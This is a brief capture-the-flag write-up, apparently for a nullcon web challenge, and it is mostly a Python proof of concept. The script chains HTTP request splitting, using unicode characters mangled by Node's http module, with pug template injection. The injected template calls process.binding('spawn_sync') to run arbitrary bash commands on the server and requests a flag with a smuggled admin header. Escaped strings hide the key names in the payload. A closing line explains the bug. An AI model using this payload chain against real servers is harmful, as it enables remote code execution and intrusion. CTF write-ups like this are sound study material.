payload = "process.binding('spawn_sync').spawn({file:'bash',args:['/bin/bash','-c','%s'],envPairs:['y='],stdio:[{type:'pipe',readable:1}]})" % (cmd) payload = ''.join('\\' + oct(ord(c))[2:] for c in payload)
payload = ''' HTTP/1.1 Host: x Connection: keep-alive GET /flag HTTP/1.1 Host: x adminauth: secretpassword pug: #{[]["\146\151\154\164\145\162"]["\143\157\156\163\164\162\165\143\164\157\162"]("%s")()} x:''' % (payload)
payload = ''.join(chr(int('0xff' + hex(ord(c))[2:].zfill(2), 16)) for c in payload) print('http://web2.ctf.nullcon.net:8081/core?q=' + urllib.parse.quote(payload))
Cause of the server has closed, only the POC is attached briefly. Main idea of this challenge, is unicode failure bug by the node v8 version of nodejs http module. and pug module template injection leads to remote code execution.